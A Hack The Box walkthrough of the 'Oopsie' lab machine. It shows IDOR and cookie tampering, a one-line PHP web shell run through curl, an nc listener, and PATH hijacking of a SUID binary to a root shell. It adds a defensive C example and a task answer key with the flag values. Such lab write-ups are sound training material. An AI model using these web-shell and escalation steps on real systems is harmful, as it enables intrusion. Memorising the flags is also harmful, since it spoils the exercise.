Oopsie - Hack The Box

Introduction

In this machine, we exploit an IDOR that leads to RCE through a malicious file upload. For privilege escalation, we take advantage of a leaked credentials file and exploit a SUID binary through PATH hijacking.

Reconnaissance

  • Connectivity
ping -c1 10.129.72.77
  • Nmap
nmap -sS --open -p- --min-rate 5000 -vvv -n -Pn 10.129.72.77

  • Fuzzing with gobuster
gobuster dir -u megacorp.com -w /usr/share/wordlists/dirb/common.txt -t 100

  • Intercept traffic with Burp Suite

  • Access the login panel

Exploitation

  • Exploit IDOR

Change the id parameter to 1

  • Change the session cookie to reach the upload directory

  • Upload malicious PHP file
echo "<?php system(\$_GET['cmd']); ?>" > cmd.php

  • Execute command
curl http://megacorp.com/uploads/cmd.php?cmd=whoami

  • Send reverse shell

nc -nlvp 9000

Post-exploitation

  • TTY

https://invertebr4do.github.io/tratamiento-de-tty/

  • Find user flag

  • Find credentials file

  • Change to robert user

  • Find SUID files
id

find / -perm -4000 -group bugtracker -ls 2>/dev/null

  • Review /usr/bin/bugtracker
strings /usr/bin/bugtracker

  • Exploit PATH Hijacking
export PATH=/tmp/:$PATH          # writable directory searched first
echo "bash -p" > /tmp/cat        # the SUID binary calls "cat" without an absolute path
chmod +x /tmp/cat
/usr/bin/bugtracker

cat /root/root.txt
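The root cause of the last step is that the SUID binary runs a helper by bare name, so the helper is resolved through the caller's PATH. The following is an added example (not the source of /usr/bin/bugtracker, which the page does not show) that contrasts that PATH-dependent pattern with a hardened version: a validated report id, an absolute path for the helper, a reset environment, and privileges dropped once they are no longer needed. The report directory /root/reports is an assumed placeholder; the functions only build the command string and never execute it.

```c
/* Added example: vulnerable vs hardened command construction in a setuid
 * program. Not the bugtracker binary's real code. */
#define _GNU_SOURCE
#include <ctype.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

#define REPORT_DIR "/root/reports"   /* assumed placeholder, not from the page */

/* Vulnerable pattern: "cat" is a bare name, so the shell spawned by system()
 * resolves it through PATH, and a writable directory prepended to PATH wins.
 * The id is also interpolated unchecked. Builds the string only. */
int build_command_vulnerable(const char *id, char *out, size_t n) {
    int r = snprintf(out, n, "cat %s/%s", REPORT_DIR, id);
    return (r < 0 || (size_t)r >= n) ? -1 : 0;
}

/* Hardened: accept only a numeric id (no shell metacharacters or "../")
 * and reference the helper by absolute path so PATH plays no part. */
int build_command_hardened(const char *id, char *out, size_t n) {
    if (id == NULL || *id == '\0') return -1;
    for (const char *p = id; *p; p++)
        if (!isdigit((unsigned char)*p)) return -1;
    int r = snprintf(out, n, "/bin/cat %s/%s", REPORT_DIR, id);
    return (r < 0 || (size_t)r >= n) ? -1 : 0;
}

/* A setuid program should discard the caller's environment (PATH, IFS,
 * LD_* and friends) before spawning anything. Returns 0 on success. */
int sanitize_environment(void) {
    if (clearenv() != 0) return -1;
    if (setenv("PATH", "/usr/bin:/bin", 1) != 0) return -1;
    return 0;
}

/* Give up the elevated identity permanently once privileged work is done.
 * Group first, while still privileged; then the user id. */
int drop_privileges(void) {
    if (setgid(getgid()) != 0) return -1;
    if (setuid(getuid()) != 0) return -1;
    return 0;
}

int main(int argc, char **argv) {
    char cmd[256];
    const char *id = (argc > 1) ? argv[1] : "1";

    if (build_command_vulnerable(id, cmd, sizeof cmd) == 0)
        printf("vulnerable would run: %s\n", cmd);

    if (sanitize_environment() != 0) return 1;
    if (build_command_hardened(id, cmd, sizeof cmd) != 0) {
        fprintf(stderr, "rejected report id: %s\n", id);
        return 1;
    }
    printf("hardened would run:   %s (PATH=%s)\n", cmd, getenv("PATH"));
    return drop_privileges() == 0 ? 0 : 1;
}
```

Running it with `1` shows both command strings; running it with `1; id` shows the hardened path rejecting the input while the vulnerable builder happily interpolates it. The absolute path is what defeats the /tmp/cat trick from the walkthrough; the environment reset and privilege drop are the defence in depth that keeps a future mistake from being root-level.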

Tasks

  1. What kind of tool can intercept web traffic?

    proxy

  2. What is the path to the directory on the webserver that returns a login page?

    /cdn-cgi/login

  3. What can be modified in Firefox to get access to the upload page?

    cookie

  4. What is the access ID of the admin user?

    34322

  5. On uploading a file, what directory does that file appear in on the server?

    /uploads

  6. What is the file that contains the password that is shared with the robert user?

    db.php

  7. What executable is run with the option “-group bugtracker” to identify all files owned by the bugtracker group?

    find

  8. Regardless of which user starts running the bugtracker executable, whose privileges will it run with?

    root

  9. What does SUID stand for?

    Set Owner User ID

  10. What is the name of the executable being called in an insecure manner?

    cat

  11. Submit user flag

    f2c74ee8db7983851ab2a96a44eb7981

  12. Submit root flag

    af13b0bee69f8a877c3faf667f7beacf